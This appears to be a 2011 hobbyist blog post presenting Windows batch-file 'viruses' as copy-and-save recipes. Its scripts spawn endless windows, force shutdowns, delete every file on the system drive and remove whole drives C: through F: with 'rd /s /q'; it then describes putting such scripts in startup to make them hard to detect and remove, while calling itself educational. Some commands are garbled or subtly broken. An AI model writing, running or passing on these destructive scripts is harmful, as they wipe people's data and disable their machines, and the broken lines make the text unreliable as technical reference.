Tuesday, July 05, 2011

This code about multiple open windows means infinite windows until continue you restart the computer:save on denger.bat and code written in notepad


This code about multiple open windows means infinite windows
until continue you restart the computer:save on denger.bat and code written in notepad
@echo off
copy 0% denger.bat
start denger.bat
This code about the computer shutdown:
@echo off
shutdown -s -t 5 -c “Shutdown”
Go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
Want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
One more …
try one this
Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q
then it is complete Save as any file you want in .bat format.. n enjoy.its really dangerous don’t try on your own pc.
NOTE :-  Howto add your own created viruses into start ups this will make it difficult to detect them n to remove them …
For this u need a registry updater software .
now move your .bat file to c:/windows and then simply run this software ur virsu will be added to your start ups i tried this with shut down , as my comp starts its shut down after 2 secs ..
Do not try it on your PC. Don’t mess around this is for educational purpose only

0 comments:

Comment here / Ask your Query !!